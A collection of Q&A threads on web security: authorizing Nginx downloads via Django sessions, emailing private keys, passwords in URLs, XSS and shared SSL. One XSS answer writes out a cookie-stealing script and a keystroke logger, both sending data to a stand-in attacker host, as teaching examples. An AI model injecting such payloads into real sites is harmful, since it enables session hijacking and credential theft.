Asymmetric on-the-fly encryption with Nginx

I want to encrypt a large static file on the server with Nginx as it is being served. The encryption should be done with a public key sent in a request header, and the endpoint should be accessible only to specific users (if someone else finds the URL, they should get an access-denied response). I also want Nginx to serve these encrypted files with random access.
First question: is this possible at all? (For the authorization part I'm all ears for any solution; my authentication and authorization are done in Django, with session keys stored in PostgreSQL, but I have no idea whether it's feasible to share them with Nginx.) Can a Lua plugin for Nginx read session data from PostgreSQL (or Redis) and do the authorization checks with good performance?
Second question: How?
One possible solution I thought about is using different certificate files (generated with passwords by Django) to serve the files over HTTPS. But I have no idea whether certificates can be dynamically generated and selected based on the URI, whether Nginx can serve files with asymmetric encryption over HTTPS, or whether the HTTPS protocol supports this at all, even with a custom client (rather than a normal browser) that can parse the data however needed.
Another possible solution is writing a Lua plugin for Nginx, but that would be an extremely expensive solution given my resources. Still, I'd be thankful if someone could tell me whether it's possible at all, even with a custom plugin.
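For what it's worth, the authorization half of this is well-trodden territory in OpenResty (Nginx with Lua). The following is only an untested sketch, assuming OpenResty with the lua-resty-redis library, a Django session cookie named sessionid, and sessions mirrored into Redis under a hypothetical session:<key> naming scheme; it shows only the access check, not the on-the-fly encryption:
# nginx.conf (OpenResty) - hypothetical location guarding the files
location /protected/ {
    access_by_lua_block {
        local redis = require "resty.redis"
        local red = redis:new()
        red:set_timeout(100)  -- milliseconds; fail fast

        local ok, err = red:connect("127.0.0.1", 6379)
        if not ok then
            ngx.exit(ngx.HTTP_INTERNAL_SERVER_ERROR)
        end

        -- Session cookie set by Django (the cookie name is an assumption)
        local sid = ngx.var.cookie_sessionid
        if not sid then
            ngx.exit(ngx.HTTP_FORBIDDEN)
        end

        -- The "session:" key prefix is hypothetical; it depends on your session backend
        local session, err = red:get("session:" .. sid)
        if not session or session == ngx.null then
            ngx.exit(ngx.HTTP_FORBIDDEN)
        end

        red:set_keepalive(10000, 100)  -- return the connection to the pool
    }
    alias /srv/files/;  # the big static files
}
With pooled Redis connections the per-request overhead is small, so the authorization part at least looks feasible; the per-request asymmetric encryption would still require custom filter code.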

Related

Sharing a Private Key with WordPress Host

We use an outside vendor to host our WordPress site. The SSL certificate will expire soon, and they have requested that I email them the contents of the PFX file, unencrypted. The PFX file contains the KEY file and the CRT file. Our SSL certificate is a wildcard for our domain; the same key is used to protect our VPN and another web server which I manage. We do not use it to sign any code.
If I have to share these files, I'd much prefer to do it by way of OneDrive or Google Drive, but the host's support person says that emailing presents no risk, since an attacker would need to get into our DNS to make use of it.
Am I justified in pushing back on this? I find it weird that they haven't even offered to send it encrypted and provide the passcode via another mechanism.
TIA

HTTP Auth vs Complex URL

Imagine I need to provide a secure endpoint with private data. Consider user1 with password1234. Is there any difference in security between:
https://website.com/myendpoint/user1/password1234
https://website.com/myendpoint with HTTP Basic Auth using the credentials given above
It seems to me there is in fact no difference, but I don't have any specific/strong arguments for it.
There is indeed a significant difference. As per best practice, you should not include any sensitive information (let alone passwords) in the URL.
The reasons are the following:
URLs get logged on the server (typically to files, but other datastores might be even worse), which might allow an attacker to extract this data; think of backups as well.
URLs might get logged and/or inspected on intermediate proxies. Consider corporate proxies with HTTPS inspection.
URLs are cached on the client and added to browser history. A script or a malicious user having gained access to a PC might extract passwords from there. Even if the intended client is programmatic, consider users who want to use your app or API from a browser for whatever reason (users are very creative :) ).
URLs might be seen on screen.
Of course not all of these apply to every use case, but some of them you have no control over. So it's best not to include any sensitive data in your URLs. HTTP Basic auth over HTTPS is much better, as the sketch below shows.
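As a minimal illustration (reusing the endpoint and credentials from the question), here is the Basic-auth variant in browser JavaScript; the credentials travel in a header rather than the URL, so they stay out of access logs, proxy URL records, and browser history:
// Hypothetical call to the endpoint from the question (inside an async function).
// btoa() base64-encodes "user:password", which is what HTTP Basic auth expects.
const resp = await fetch("https://website.com/myendpoint", {
  headers: { "Authorization": "Basic " + btoa("user1:password1234") }
});
const data = await resp.json();
Note that Basic auth still sends the password with every request, so it only makes sense over HTTPS.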

XSS (cross-site scripting) in practice

I know an XSS attack uses the input points of a page to insert JavaScript code into the page or into the server's DB.
In both cases the JavaScript code will be activated sooner or later by some event.
I imagine an attacker who uses a browser to put JavaScript code into a server's DB, maybe through a name input.
Another client (the victim) makes a request to the same server, maybe asking for the user ranking.
The attacker is in the ranking, so the attacker's name (actually evil JavaScript code) is inserted into the page the victim requested.
The question is: what information can the attacker steal, and how?
I imagine the attacker wants to get cookies. And I imagine he wants to include one of his evil scripts via the injected JavaScript code.
In this way he can pass the cookie information to a JSP/ASP page or whatever he runs.
So if the site is served over HTTPS, is it possible to include scripts hosted on an HTTP server?
I don't believe the attacker would use an HTTPS server to host his scripts, because it could soon easily be traced back to him.
Or maybe there are other ways for the attacker to get information?
I imagine the attacker wants to get cookies. And I imagine he wants to include one of his evil scripts via the injected JavaScript code. In this way he can pass the cookie information to a JSP/ASP page or whatever he runs.
The question is: what information can the attacker steal, and how?
Yes, the easiest type of attack would be to steal non-HttpOnly cookies:
<script>
new Image().src = 'https://www.evil.com/?' + escape(document.cookie);
</script>
Other attacks include injecting JavaScript keyloggers that send keystrokes back to the attacker in a similar fashion, or redirecting the user to phishing sites or to sites containing drive-by downloads.
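A keylogger of that sort can be as small as the cookie stealer above. This sketch (the attacker's domain is again hypothetical) exfiltrates each keystroke with the same image-request trick:
<script>
document.addEventListener('keypress', function (e) {
    // Every keystroke becomes a request the attacker can read in his server logs.
    new Image().src = 'https://www.evil.com/log?' + encodeURIComponent(e.key);
});
</script>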
So if the site is served over HTTPS, is it possible to include scripts hosted on an HTTP server? I don't believe the attacker would use an HTTPS server to host his scripts, because it could soon easily be traced back to him.
Interesting question. The site being HTTPS does not reduce the chances of an XSS flaw, but since browsers block mixed content (plain-HTTP scripts on an HTTPS page), the attacker would need to host their attacking script on an HTTPS-enabled web server with a certificate trusted by the victim's machine. This could be the attacker's own machine with a cheap SSL certificate paid for with Bitcoin, where only the domain is validated (not the organisation); it could be an already compromised machine (e.g. if the attacker already controls another public website); or it could be a certificate stolen from another hacked site that the attacker is now using on their domain (in combination with a DNS hijack or MITM). Edit: nowadays it is possible to get free certificates from the likes of Let's Encrypt and similar.
Little security is required to get a Domain Validated certificate:
Low assurance certificates include only your domain name in the certificate. Certificate Authorities usually verify that you own the domain name by checking the WHOIS record. The certificate can be issued instantly and is cheaper but, as the name implies, these certificates provide less assurance to your customers.
You can use a Web Application Firewall to scan and block XSS, including in cookies (though the latter can cause false positives).
For AWS WAF, refer to https://aws.amazon.com/waf/

HTTP, HTTPS, Shared SSL, and SEO

I was recently looking around at some of the features my current web host offers, and am now wondering about a few things. Even if you can only answer part of this, I appreciate any help you can provide.
I have a domain, mydomain.com, and the host offers shared SSL, so I can use HTTPS via the address https://mydomain.myhost.com. The SSL certificate is good for *.myhost.com.
I don't know a lot about SSL, but I'm assuming this means that the data between site users and ANY domain on myhost.com is encrypted. So I was curious: since anyone else on the same host also has an https://theirdomain.myhost.com address that uses the same SSL certificate, could they view my site's data if they somehow intercepted it? I may have no idea at all; this was pretty much a guess.
If HTTPS is used on a login page, but after logging in the other pages are viewed over HTTP, is this a security issue?
Is there any way to show a web form via HTTP for bots like Google, but redirect real users to the HTTPS version? It would be ideal if this could be done via .htaccess. I currently have some rewrite rules that redirect certain pages to HTTPS but leave the rest as HTTP, so a visitor to the contact form gets the HTTPS version automatically, and it automatically switches back to HTTP for pages that don't contain forms. So, via .htaccess, is there a way to direct real users to the HTTPS version but bots to the HTTP version? I would like these pages to still be indexed by the search engines, but would like users to see them via HTTPS.
Thanks in advance for any help you can provide.
I'm going to guess you'll be okay for number one. If your host does it correctly, individual subdomains never get to see the SSL keys. Here's how it would work:
Some guy with a browser sends an encrypted request to your subdomain server.
Your host's master server receives the request and decrypts it.
The master server sends the decrypted request to your subdomain server.
And any HTTPS responses you send back go through that process in reverse. It should be easy to check if they've set things up that way: If you can set up shared SSL without personally handling any key files, you're good. If you actually get your hands on some key files... not good.
For two: If you encrypt the login, you protect the passwords, which is good. But if you switch back to HTTP afterwards, you open yourself up to other attacks. See: Firesheep. There may be others.
And for three: yes, definitely doable. Check out mod_rewrite. I've never used this particular case myself, but I can point you to this page - particularly the section entitled "Browser Dependent Content" - and sketch the idea below.
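Untested, but a rewrite rule along these lines captures the idea; the bot names and the page pattern are assumptions you would adapt:
# .htaccess sketch: push browsers to HTTPS, let known crawlers stay on HTTP.
RewriteEngine On
RewriteCond %{HTTPS} off
RewriteCond %{HTTP_USER_AGENT} !(googlebot|bingbot) [NC]
RewriteRule ^contact\.php$ https://%{HTTP_HOST}%{REQUEST_URI} [R=302,L]
Do be aware that serving bots different content than users can be treated as cloaking by search engines.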
Hope that helps!
All traffic is encrypted when you use https:// as the protocol (except under some uncommon circumstances I won't talk about here). An SSL certificate's purpose is to prove the identity of the server by combining its public key with an identity. This certificate is only usable with the private key that belongs to the public one. In your case it seems that this certificate, as well as the key pair, is provided by your hosting provider. I guess that neither you nor the other customers on the host have access to this private key. That means that only your provider is able to decrypt the traffic. Since that's always the case (they run the server, so they have access to all data), that should be no problem.
In most cases it is a security issue. On every further unencrypted HTTP request, the client has to send some session information to the server. Simply speaking, this can be intercepted and reused by an attacker.
The bots should support HTTPS, so why not redirect them too? Anyhow, the important part is not serving the page that contains the form via HTTPS; to protect your users' data you should take care that the form is submitted via HTTPS.
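In other words (a minimal illustration; the URL and field names are hypothetical), what matters for the submitted data is where the form posts to:
<!-- The user's data is protected in transit because the action URL is HTTPS. -->
<form action="https://mydomain.myhost.com/contact" method="post">
  <input type="text" name="email">
  <textarea name="message"></textarea>
  <button type="submit">Send</button>
</form>
(Though note that a form delivered over plain HTTP can itself be tampered with in transit, so serving the form page over HTTPS as well is the safer habit.)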

Bad idea to pass username and password in the URL when using SSL?

Scenario:
I have an ASP.NET / Silverlight website with web services that supply the Silverlight apps with data. The website uses forms authentication, and thus the web services can also authenticate requests.
Now I would like to pull some data from this system into an Android application. I could implement code for running the forms login and storing the authentication cookie, but it would actually be much simpler to send the username and password in the web service URL and authenticate each call. I don't really see a big problem with this, as the communication is SSL encrypted, but I'm open to being convinced otherwise ;)
What do you think? Bad idea / not so bad idea?
Conclusion:
After reviewing the answers, the only really valid argument against name/pass in the URL request string is that it's stored in the server log files. Granted, it's my server, and if that server is hacked then the data it stores will also be hacked, but I still don't like passwords showing up in logs. (That's why they are stored salted and encrypted.)
Solution:
I will POST the username and password with the request. Minimal extra work, and more secure.
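For the record, a sketch of what that request looks like (shown in JavaScript for brevity; the endpoint and field names are hypothetical): the credentials ride in the POST body over SSL instead of in the URL:
// Inside an async function. The password is in the request body,
// so it never appears in URLs or access logs.
const resp = await fetch("https://example.com/service/login", {
  method: "POST",
  headers: { "Content-Type": "application/x-www-form-urlencoded" },
  body: "username=" + encodeURIComponent("user1") +
        "&password=" + encodeURIComponent("password1234")
});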
See Are querystring parameters secure in HTTPS (HTTP + SSL)?
Everything will be encrypted, but the URLs, along with the query string (and thus the passwords) will show up in the server log files.
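To make that concrete, a typical access-log entry (Common Log Format; the values here are invented) records the full path and query string:
203.0.113.7 - - [12/Jan/2015:10:21:44 +0000] "GET /service/getdata?username=user1&password=password1234 HTTP/1.1" 200 5113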
Bad idea: The contents of your POST are encrypted, and though the URL parameters are encrypted in transit as well, they could still be visible to third-party trackers, in server logs, or to other monitoring software running on either endpoint. It is just not a good idea to open up a potential security hole in this way.
Users do tend to copy-and-paste URLs straight from their address bar into emails, blogs, etc., and save them in bookmarks, and so on.
And things like plugins, or even other software that reads, for example, window properties (alternate shells, theme managers, accessibility software), could end up with the info. And they might, for example, crash and automatically send crash dumps back to their developers.
And worms far less sophisticated than keyloggers - like things that take screenshots - can get passwords this way. Sometimes even security software can, for example when deployed in a corporate network.
And if the user has a local proxy, then they might be communicating in plaintext with the proxy, which in turn talks SSL to the server (not the way it's supposed to be done, but it happens).
And for these and more reasons, URLs with embedded usernames and passwords - which used to be standard, such as ftp:// URLs with credentials in the authority segment - are now typically forbidden by browsers.
https://www.rfc-editor.org/rfc/rfc3986#section-7.5
So, an emphatic NO, DO NOT DO THIS.
It is always good programming practice not to put sensitive info like usernames and passwords in the URL. No matter how good a site is, it can be compromised. So why expose more information than you have to?
